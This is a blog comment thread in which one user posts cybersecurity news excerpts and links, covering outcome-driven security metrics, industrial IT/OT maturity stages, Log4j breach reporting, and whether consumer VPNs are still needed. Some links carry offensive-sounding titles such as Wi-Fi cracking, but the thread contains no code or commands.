As an example, in the study we asked about threat detection programs. Those that had outsourced programs thought theirs were strongest, but it turns out that if you keep your threat detection in-house, your mean time to respond (MTTR) is much lower (i.e., better). In other words, when security is based on a gut feeling rather than on concrete metrics, you may not be setting up the defense that you want.
Board engagement also spurs compliance. In my experience, board members tend to be quite aware of compliance and regulatory issues and will often support whatever measures are needed to meet compliance standards. This is because the risk of fines is a concrete, well-understood business risk. By the same token, the last two years of the pandemic, driving IT to re-architect its remote access in a hurry as employees went home, the board has grown to appreciate the availability risks.
The more IT and security can interact with the business directly—during frequent feedback loop sessions, for example—the more they will be on the same page about the risks and security measures that will keep the business safe.
In the study, two key strategies scored more beneficial security outcomes than even I would have thought: proactively refreshing your technology and integrating it.
Security, after all, should be seen for what it is: a growth enabler, supporting the business in every aspect of its mission. The more the business side feels supported, the more closely they will work with security before, during, and after a security incident. More importantly, they will engage earlier with security to build in the right processes and controls into every initiative from the beginning, rather than frantically slapping on a layer of security right before a release to production.
There is no shortage of evolving security threats out there today, but I’m still optimistic. Security awareness is growing at all organizational levels. And many teams are coming out of the pandemic with greater agility, flexibility, and support.
What is needed, however, is that shift from simply following best practices and regulatory requirements and a move toward tying security initiatives directly to security efficacy for the business. Outcomes, not best practices, should be the yardstick by which we are measuring.
Tomi Engdahl says:
Cybersecurity and IT/OT convergence: A pathway to digital transformation
https://www.controleng.com/articles/cybersecurity-and-it-ot-convergence-a-pathway-to-digital-transformation/?oly_enc_id=0462E3054934E2U
The history of industrial information technology (IT) set the stage for the Industrial Internet of Things (IIoT) and digital transformation; keep it safe with cybersecurity best practices.
Recognizing the industrial IT “layer”
Many organizations struggle with developing an industrial IT infrastructure that is stable, secure and a foundation that enables the pursuit of smart manufacturing technologies. The commonly cited (and valid) reasons for this include:
The return on investment (ROI) is difficult to calculate, and infrastructure costs are high in general
The technologies and their benefits are not widely understood
The skillsets to maintain the infrastructure are difficult to find.
In addition to and perhaps transcending these challenges is that organizations do not always recognize the infrastructure as its own “layer” within their OT systems. Instead, many — especially those who are not technical — lump the infrastructure together with the control system as one. By doing so, they make it difficult or impossible for the organization to identify and invest in infrastructure upgrades.
The most succinct way to demonstrate the detriment is by considering how control systems are purchased. When a machine or manufacturing system is procured, the vendor will deploy the system along with some networking hardware, touchscreen PCs and perhaps servers to host the control system. Separately, a different system may be procured, which is deployed with different networking hardware, touchscreen PCs and servers, and so on. Before long, the industrial IT within the facility is inconsistent, fragmented, difficult to manage and difficult to integrate into one seamless architecture.
When it comes to acknowledging the industrial IT “layer,” an important observation is most organizations’ IT departments already understand the technologies in use. IT departments can help by spearheading infrastructure requirements and standardization efforts for the industrial environment and being included in conversations at the earliest stages of the procurement process.
The stages of industrial IT maturity
Organizations — especially those experiencing the evolution for the first time — can benefit from following industry best practices and by following in the footsteps of other organizations. By doing so, the total cost required to achieve a mature and optimized industrial IT environment can be reduced and rollout can be done within a shorter timeline.
Stage 1: Islands of automation. When beginning the manufacturing digitalization journey, leaders may not be familiar with the value of enhanced connectivity or, if they are, it’s considered a problem that does not yet need to be addressed. In their minds, the priority is manufacturing to meet customer demand and reducing investment costs to keep operations lean. Often, the output of this type of thought process is installing original equipment manufacturer (OEM) equipment and systems that operate independently and within their own networked environment.
It is not uncommon to see connectivity between systems being addressed in some locations, but not all locations.
Stage 2: Flat, connected industrial network. Eventually, the operational pains of having islands of automation and the ways it restricts progress force the organization to re-engineer its industrial IT architecture. In the absence of a higher-level plan, the operational staff makes do with the resources and time available, and change is made via “the path of least resistance.”
This manifests itself as low-cost, unmanaged switches being installed where physical space can be found and wherever an Ethernet connection is needed. Workstations meant for monitoring or controlling industrial systems may have internet connectivity to make staff’s day-to-day obligations simpler without thought toward security implications.
When OEM equipment is purchased, it is shipped to the owner with pre-configured IP addresses, so staff installs a gateway to bridge the new equipment to the plant’s existing network.
Stage 3: Architected infrastructure. Organizations operating with flat, connected industrial networks can face pressure on several fronts to invest in industrial IT improvements. Organizations will start to understand the value in digital transformation technologies, use them to remain competitive and may realize they must invest in their infrastructure to pursue those technologies. Operational inefficiencies, staff frustration and downtime attributed to the lack of standardization and management of an organization’s infrastructure may convince leaders to set aside funds for improving the infrastructure.
Regardless of which pressure tips the scale, most organizations will turn to validated architectures and industry best practices for further improving their connectivity and (finally) start to prioritize security. Within their computing infrastructure, investments will be made in server virtualizations and standardized hardware. Organizations may also invest in thin client deployments and other remote connectivity solutions to centralize the way they host and access industrial applications across facilities. In terms of networking, virtual local area networks (VLANs) may be implemented to segment the network and demilitarized zones (DMZs) may be installed for management and IT/OT connectivity.
Stage 4: Managed ICS security and cloud technologies. Once an organization has an underlying industrial IT infrastructure following best practices and standard architectures, they will be well-suited for implementing Industry 4.0 technologies and optimizing their operations. Plant floor data can be collected and analyzed to improve overall equipment effectiveness (OEE) or quality, and data may be synchronized to the organization’s enterprise resource planning (ERP) in real time to improve business decision making such as managing supplies and product orders.
Just as the organization experienced during its transition from having islands of automation to a connected industrial network, the ICS security risks increase as connectivity is expanded and infrastructure improvements are made. Technical configurations alone — such as VLAN segmentation — are not sufficient for managing the cybersecurity risks, and a continuous cybersecurity program akin to a safety program is required to manage the ongoing risk.
Tomi Engdahl says:
Industrial access on the go
Adoption of industrial automation mobile access continues to increase as technologies improve and user concerns are addressed.
https://www.controleng.com/articles/industrial-access-on-the-go/?oly_enc_id=0462E3054934E2U
Tomi Engdahl says:
2021 CWE Most Important Hardware Weaknesses
https://cwe.mitre.org/index.html
A first-of-its-kind, community-developed list of hardware weaknesses with detailed descriptions and authoritative guidance for mitigating and avoiding them.
https://cwe.mitre.org/scoring/lists/2021_CWE_MIHW.html
Tomi Engdahl says:
The Art of CISO – Master of Warfare
https://pentestmag.com/the-art-of-ciso-master-of-warfare/
Tomi Engdahl says:
https://pentestmag.com/sql-injection-to-rce/
Tomi Engdahl says:
Data Protection Ombudsman: A data breach caused by the Log4j vulnerability must be reported
https://www.kauppalehti.fi/uutiset/tietosuojavaltuutettu-log4j-haavoittuvuudesta-aiheutuneesta-tietomurrosta-on-ilmoitettava/fd919778-753d-4375-ad8a-609cf6fdea17
If personal data has been compromised because of a Log4j attack, the affected individuals must also be notified.
Tomi Engdahl says:
It’s probably time to say goodbye to your VPN
https://www.nbcnews.com/tech/internet/vpns-encryption-wifi-rcna9348
VPNs, or virtual private networks, continue to be used by millions of people as a way of masking their internet activity by encrypting their location and web traffic.
But on the modern internet, most people can safely ditch them, thanks to the widespread use of encryption that has made public internet connections far less of a security threat, cybersecurity experts say.
“Most commercial VPNs are snake oil from a security standpoint,” said Nicholas Weaver, a cybersecurity lecturer at the University of California, Berkeley. “They don’t improve your security at all.”
It’s a development that highlights how the cybersecurity landscape has changed: Hackers are less likely to target people’s individual devices and instead focus on the login information to their most important accounts.
For years, experts warned it was dangerous for average people to use the Wi-Fi at a public place like a coffee shop without taking steps to obscure their internet traffic. Someone sharing a Wi-Fi network with strangers was essentially sharing all their traffic with others who were using it. If someone decided to check their bank balance, for example, they ran the risk of a nearby hacker being able to steal sensitive information.
VPNs offered a way to counter that problem. VPNs reroute a user’s internet traffic through their own servers. That can slow browsing speed, but provides the benefit of hiding a user’s Internet Protocol address — which includes their general location — from the websites they visit.
But that’s no longer the problem it once was. Most browsers have quietly implemented an added layer of security in recent years that automatically encrypts internet traffic at most sites with a technology called HTTPS. Indicated by a tiny padlock by the URL, the presence of HTTPS means that worrisome scenario, in which a scammer or a hacker squats on a public Wi-Fi connection in order to watch people’s internet habits, isn’t feasible.
It’s not clear that the threat of a hacker at your coffee shop was ever that real to begin with, but it is certainly not a major danger now, Weaver said.
“Remember, someone attacking you at the coffee shop needs to be basically AT the coffee shop,” he said. “I don’t know of them ever being used outside of pranks. And those are all irrelevant now with most sites using HTTPS,” he said in a text message.
There are still valid uses for VPNs. They’re an invaluable tool for getting around certain types of censorship, though other options also exist, such as the Tor Browser, a free web browser that automatically reroutes users’ traffic and is widely praised by cybersecurity experts.
VPNs are also vital for businesses that need their employees to log in remotely to their internal network. And they’re a popular and effective way to watch television shows and movies that are restricted to particular countries on streaming services.
But like with antivirus software, the paid VPN industry is a booming global market despite its core mission no longer being necessary for many people. Most VPNs market their products as a security tool. A Consumer Reports investigation published earlier this month found that 12 of the 16 biggest VPNs make hyperbolic claims or mislead customers about their security benefits. And many can make things worse, either by selling customers’ browsing history to data brokers, or by having poor cybersecurity.
The fix is largely thanks to activists who have pushed for more than a decade for a safer way to browse the internet.
In 2010, cybersecurity activists at the Electronic Frontier Foundation, an internet freedom advocacy group, launched a project to encrypt as much web traffic as possible by developing browser extensions to let users toggle HTTPS and giving websites free tools to enable it.
As more and more people started using HTTPS wherever possible, some of the companies that help most people use the internet got on board. In 2015, Google started prioritizing websites that enabled HTTPS in its search results. More and more websites started offering HTTPS connections, and now practically all sites that Google links to do so.
Since late 2020, major browsers such as Brave, Chrome, Firefox, Safari and Edge all built HTTPS into their programs, making Electronic Frontier Foundation’s browser extension no longer necessary for most people.
“Years ago, nobody could imagine that. It’s kind of one of those background wins,” said Alexis Hancock, who oversees the HTTPS project as the foundation’s director of engineering.
Users now need to worry far less about being hacked by a fellow coffee shop patron than by a hacker simply sending an email from anywhere around the world to trick them into giving up their passwords and other sensitive information, she said.
Hackers “would likely do a phishing attack on you before they would walk into a cafe with free Wi-Fi,” Hancock said. “Sending people nefarious emails, it’s much easier to do that kind of campaign. Those have been tried and true, unfortunately,” she said.
Tomi Engdahl says:
NIST SP 800-171 CUI Sanitization and Destruction Methods
November 16, 2021
Learn how to meet your NIST SP 800-171 media sanitization and destruction requirements.
https://cubcyber.com/nist-sp-800-171-cui-sanitation-and-destruction-methods
Tomi Engdahl says:
https://www.businessopas.fi/kauppa/tietoturvaa-tarvitaan-kaikilla-toimialoilla/#
Tomi Engdahl says:
6 Must-Have Open-Source Tools to Secure Your Linux Server
BY WINI BHALLA
PUBLISHED JUL 14, 2021
Don’t want to compromise on the security of your Linux server? Install these six tools to set up an impenetrable network.
https://www.makeuseof.com/open-source-tools-to-secure-linux-server/
Tomi Engdahl says:
The great security delusion: We know what works
Why organizations need to adopt evidence-driven security programs and tactics, according to Cisco’s head of advisory CISOs Wendy Nather.
https://brand-studio.fortune.com/cisco/the-great-security-delusion-we-know-what-works/?prx_t=CjcHAAAAAAoPEQA&fbclid=IwAR2pcydYEHo1N8DiojnqGW4Vhc9thibIW8AvrGvERVxj1wbQFp8jwFOoL9A
Tomi Engdahl says:
Rethinking Cybersecurity Jobs as a Vocation Instead of a Profession
https://www.darkreading.com/careers-and-people/rethinking-cybersecurity-jobs-as-a-vocation-instead-of-a-profession
The prevailing mindset is that security practitioners are professionals, and thus, require a college degree. But there are some flaws in that logic.
Tomi Engdahl says:
Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat by Brannon Dorsey
https://hakin9.org/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat/
Tomi Engdahl says:
Codex Exposed: Exploring the Capabilities and Risks of OpenAI’s Code Generator https://www.trendmicro.com/en_us/research/22/a/codex-exposed–exploring-the-capabilities-and-risks-of-openai-s-.html
The first of a series of blog posts examines the security risks of Codex, a code generator powered by the GPT-3 engine.
Tomi Engdahl says:
Organized Cybercrime Cases: What CISOs Need to Know https://www.trendmicro.com/en_us/ciso/22/a/organized-cybercrime-what-cisos-need-to-know.html
Recently, Trend Micro Research analyzed a new service offering, called Access as a Service (AaaS), in the undergrounds whereby malicious actors are selling access into business networks. AaaS is part of a developing trend in cybercrime, which is the increased specialization of services within CaaS and increased collaboration among these groups. Thinking from an incident response mentality, this means they will have to identify these different groups completing specific aspects of the overall attack, making it tougher to detect and stop attacks.
Tomi Engdahl says:
WebSpec, a formal framework for browser security analysis, reveals new cookie attack https://www.theregister.com/2022/01/08/webspec_browser_security/
Folks at Technische Universität Wien in Austria have devised a formal security framework called WebSpec to analyze browser security. And they’ve used it to identify multiple logical flaws affecting web browsers, revealing a new cookie-based attack and an unresolved Content Security Policy contradiction. These logical flaws are not necessarily security vulnerabilities, but they can be. They’re inconsistencies between Web platform specifications and the way these specs actually get implemented within web browsers.
Tomi Engdahl says:
Extracting Cobalt Strike Beacons from MSBuild Scripts https://isc.sans.edu/forums/diary/Extracting+Cobalt+Strike+Beacons+from+MSBuild+Scripts/28200/
Tomi Engdahl says:
The Second Building Block for the SOC of the Future: An Open Integration Framework
https://www.securityweek.com/second-building-block-soc-future-open-integration-framework
Tomi Engdahl says:
The blame game: EU criticized for ‘fragmented and slow’ approach to cyber-attack attribution https://portswigger.net/daily-swig/the-blame-game-eu-criticized-for-fragmented-and-slow-approach-to-cyber-attack-attribution
The European Union lacks coherence when it comes to responding to cyber-attacks because of problems surrounding attribution, a new report warns. In ‘Attribution: A Major Challenge for EU Cyber Sanctions’, Annegret Bendiek and Matthias Schulze of the German Institute for International and Security Affairs analyze the policy responses to the WannaCry, NotPetya, Cloud Hopper, OPCW, and Bundestag cybersecurity incidents and conclude that the process of attribution tends to be fragmented and slow. “Right now, every member state does its own attribution and political and legal assessment of cyber-incidents,” Schulze tells The Daily Swig. “Since capabilities vary, it is possible that member states assess the same incident quite differently and this leads to a fragmented response.” Also:
https://www.swp-berlin.org/en/publication/attribution-a-major-challenge-for-eu-cyber-sanctions#hd-d41750e3739
Tomi Engdahl says:
Europol ordered to erase data on those not linked to crime https://www.bleepingcomputer.com/news/security/europol-ordered-to-erase-data-on-those-not-linked-to-crime/
The European Data Protection Supervisor (EDPS), an EU privacy and data protection independent supervisory authority, has ordered Europol to erase personal data on individuals that haven’t been linked to criminal activity. The EU data watchdog issued this order after admonishing Europol in September 2020 for storing large amounts of data on individuals that haven’t been linked to criminal activity, putting their fundamental rights at risk.
Tomi Engdahl says:
Cyber Command partners with US universities to prepare graduates for military cyber roles https://therecord.media/cyber-command-partners-with-us-universities-to-prepare-graduates-for-military-cyber-roles/
US Cyber Command announced last week a partnership with 84 colleges and universities from 34 states and the District of Columbia aimed at educating and preparing graduates for cybersecurity roles in the US military.